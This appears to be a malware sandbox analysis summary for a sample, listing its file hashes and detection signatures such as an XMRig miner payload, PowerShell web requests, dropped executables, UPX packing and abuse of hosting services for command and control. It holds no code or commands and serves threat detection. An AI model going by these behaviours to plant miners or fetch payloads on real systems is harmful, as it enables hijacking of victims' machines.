General

  • Target

    54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics

  • Size

    2.8MB

  • Sample

    240515-3h3wsaaa83

  • MD5

    54c425ba96686c0ab10c9eeb3d8381d0

  • SHA1

    ee8d10db98949f6eae7edfbb4f7a3a0c34465867

  • SHA256

    e78c71ec9c29cf725d26cb88c1a6ba23d7ddf41b254fbb282264b1c56148e4ec

  • SHA512

    94175f8257c411529984ca7a16d8dc6bc131177f1afbb29b959c45de91d2acb94ed56bb7cc51b6ee4dad672682ef2de86c602f7264d8e9bada7dace55d1c610d

  • SSDEEP

    49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0IlnASEx/Rk/:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2Rz

Malware Config

Targets

    • Target

      54c425ba96686c0ab10c9eeb3d8381d0_NeikiAnalytics

    • Size

      2.8MB

    • MD5

      54c425ba96686c0ab10c9eeb3d8381d0

    • SHA1

      ee8d10db98949f6eae7edfbb4f7a3a0c34465867

    • SHA256

      e78c71ec9c29cf725d26cb88c1a6ba23d7ddf41b254fbb282264b1c56148e4ec

    • SHA512

      94175f8257c411529984ca7a16d8dc6bc131177f1afbb29b959c45de91d2acb94ed56bb7cc51b6ee4dad672682ef2de86c602f7264d8e9bada7dace55d1c610d

    • SSDEEP

      49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0IlnASEx/Rk/:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2Rz

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Legitimate hosting services abused for malware hosting/C2

MITRE ATT&CK Enterprise v15

Tasks